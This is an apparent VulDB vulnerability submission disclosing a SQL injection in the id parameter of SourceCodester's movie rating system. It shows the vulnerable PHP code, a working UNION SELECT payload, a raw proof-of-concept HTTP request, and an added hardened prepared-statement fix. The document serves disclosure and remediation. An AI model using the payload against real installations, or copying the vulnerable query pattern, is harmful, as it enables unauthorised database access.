Submission #425464: SourceCodester Sentiment Based Movie Success Rating Prediction System v1.0 SQL Injection

Title: SourceCodester Sentiment Based Movie Success Rating Prediction System v1.0 SQL Injection

Description:

# SQL Injection vulnerability discovered in Sourcecodester's Sentiment Based Movie Success Rating Prediction System (movie details)

Official Website: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html

Version: 1.0

Related code file: /msrps/movie_details.php

dbname=msrps_db

Payload: /msrps/?page=movie_details&id=-1' union select 1,database(),3,4,5,6,7,8,9,10,11,12,13--+

<hr>

```php
<?php
if(isset($_GET['id'])){
    // Vulnerable: $_GET['id'] is interpolated straight into the query string
    $qry = $conn->query("SELECT * FROM `movie_list` where id = '{$_GET['id']}'");
    if($qry->num_rows > 0){
        $res = $qry->fetch_array();
        foreach($res as $k => $v){
            if(!is_numeric($k)){
                $$k = $v;
            }
        }
        $genre_qry = $conn->query("SELECT * FROM genre_list where id in ({$genres})");
        $genre_arr = [];
        if($genre_qry->num_rows > 0)
            $genre_arr = array_column($genre_qry->fetch_all(MYSQLI_ASSOC),'name');
        $genre_names = count($genre_arr) > 0 ? implode(", ",$genre_arr) : "N/A";
        $description = str_replace("\n","<br>",$description);
    }else{
        echo "<script>alert('Unknown Movie ID'); location.replace('./?page=movies');</script>";
    }
} else{
    echo "<script>alert('Movie ID is required'); location.replace('./?page=movies');</script>";
}
?>
```

The `id` variable is inserted directly into the SQL query without any escaping or parameterization (lines 1-24 of movie_details.php). An attacker can inject arbitrary SQL by manipulating the `id` parameter. The payload above uses `-1` so that the original `WHERE` clause matches no row, then appends a `UNION SELECT` with 13 columns (matching `movie_list`) so the attacker-chosen values, here `database()`, are returned in the movie record and rendered by the page.

Injection parameter: id

```
GET /msrps/?page=movie_details&id=-1%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13--+ HTTP/1.1
Host: 192.168.1.88
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=hagsp16r9jlvhceptmto1ngf5t
Connection: close
```

![image](https://github.com/user-attachments/assets/0bbc5ccb-5604-4314-858a-8050d0ed16b4)
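The following is an added example of how the lookup above can be hardened; it is not code from the SourceCodester project or the submitter. It assumes, as the vulnerable snippet does, that `$conn` is a `mysqli` connection, that `movie_list.id` is an integer primary key, that `movie_list.genres` holds a comma-separated list of `genre_list.id` values, and that the `mysqlnd` driver is available for `get_result()`. The `fetch_movie()` function name is hypothetical. The `id` parameter is validated as a plain integer and then bound with a prepared statement, so a value such as `-1' union select ...` can no longer change the structure of the query; the genre lookup is parameterized the same way for consistency.

```php
<?php
// Added example (not the project's code): hardened movie_details.php lookup.
// Assumes $conn is a mysqli connection and mysqlnd is available for get_result().

function fetch_movie(mysqli $conn, string $raw_id): ?array {
    // Reject anything that is not a plain non-negative integer before it reaches SQL.
    if (!ctype_digit($raw_id)) {
        return null;
    }
    $id = (int) $raw_id;

    // Prepared statement: the id travels as a bound parameter, never as query text,
    // so "-1' union select ..." is compared as a literal and matches nothing.
    $stmt = $conn->prepare("SELECT * FROM `movie_list` WHERE id = ?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $movie = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    if ($movie === null) {
        return null;
    }

    // genres is stored as a comma-separated id list (assumption); expand it into
    // one placeholder per id instead of interpolating the string into IN (...).
    $genre_ids = array_values(array_filter(
        array_map('trim', explode(',', (string) ($movie['genres'] ?? ''))),
        'ctype_digit'
    ));
    $genre_names = [];
    if ($genre_ids !== []) {
        $placeholders = implode(',', array_fill(0, count($genre_ids), '?'));
        $gstmt = $conn->prepare("SELECT name FROM genre_list WHERE id IN ($placeholders)");
        $gstmt->bind_param(str_repeat('i', count($genre_ids)), ...$genre_ids);
        $gstmt->execute();
        $genre_names = array_column($gstmt->get_result()->fetch_all(MYSQLI_ASSOC), 'name');
        $gstmt->close();
    }
    $movie['genre_names'] = $genre_names !== [] ? implode(', ', $genre_names) : 'N/A';
    return $movie;
}

if (!isset($_GET['id'])) {
    echo "<script>alert('Movie ID is required'); location.replace('./?page=movies');</script>";
    exit;
}
$movie = fetch_movie($conn, (string) $_GET['id']);
if ($movie === null) {
    echo "<script>alert('Unknown Movie ID'); location.replace('./?page=movies');</script>";
    exit;
}
// HTML-escape on output, then convert newlines, instead of a bare str_replace.
$description = nl2br(htmlspecialchars($movie['description'] ?? '', ENT_QUOTES, 'UTF-8'));
$genre_names = $movie['genre_names'];
```

Note that the `$$k = $v` loop from the original is deliberately dropped: creating variables from database column names makes it hard to reason about which values reach later queries, and explicit array access keeps the data flow visible. To verify the fix, replay the proof-of-concept request above; the hardened page should respond with the "Unknown Movie ID" redirect rather than a row containing the database name.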
Source: https://github.com/2967607153/CVE-report/blob/main/Sourcecodester-SQLi-Sentiment-Based-Moive-Rating.md
User: xuelian.Deng (UID 76269)
Submitted: 17/10/2024 09:15 (2 years ago)
Moderated: 18/10/2024 21:29 (2 days later)
Status: accepted
VulDB entry: 280950 [SourceCodester Sentiment Based Movie Rating System 1.0 /msrps/movie_details.php ID SQL Injection]
Points: 20
